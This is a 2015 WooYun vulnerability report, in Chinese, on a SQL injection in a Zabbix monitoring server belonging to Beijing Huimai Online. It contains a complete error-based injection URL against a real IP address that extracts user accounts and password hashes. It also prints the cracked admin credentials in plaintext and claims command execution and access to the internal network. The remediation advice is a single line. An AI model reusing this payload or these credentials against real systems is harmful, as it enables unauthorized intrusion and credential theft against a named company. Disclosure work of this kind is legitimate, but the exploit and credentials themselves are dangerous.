漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0140271
漏洞标题:北京惠买在线监控系统SQL注入漏洞
相关厂商:北京惠买在线
漏洞作者: 路人甲
提交时间:2015-09-15 12:31
修复时间:2015-10-30 12:32
公开时间:2015-10-30 12:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
官网:http://www.huimai365.com/ 北京惠买在线网络科技有限公司
集团创建于2010年,旗下拥有“优品惠”“惠健康”“惠成长”“惠美丽”“惠收藏”“惠保”“惠珠宝”等移动互联零售平台,同时管理运营多个自有品牌商品。集团已布局完成电视、网络、手机、电话、型录等多个营销渠道,通过创意视频、场景化销售提升内容营销水平,同时借助各平台数据,实现数据整合营销,是一个文化创意和科技创新相结合的多品牌、多渠道的创新型企业。
集团总部园区位于北京亦庄经济开发区,占地面积共500多亩,主要为综合业务办公场地,包括商品开发、节目制作、行销企划和行政服务等;同时集团在其周边还拥有员工生活服务配套设施用地。目前集团员工总数达3000多人。
详细说明:
Zabbix注入:http://58.83.167.66/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29
密码破解:cf61adc3d6519eac926b44a97fd1d7b3
admin bjhm1234
漏洞证明:
成功登陆系统,监控大量服务器:
可执行命令,可进一步内网:
截图中可以看到 zabbix.huimai365.com
修复方案:
修补zabbix漏洞。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝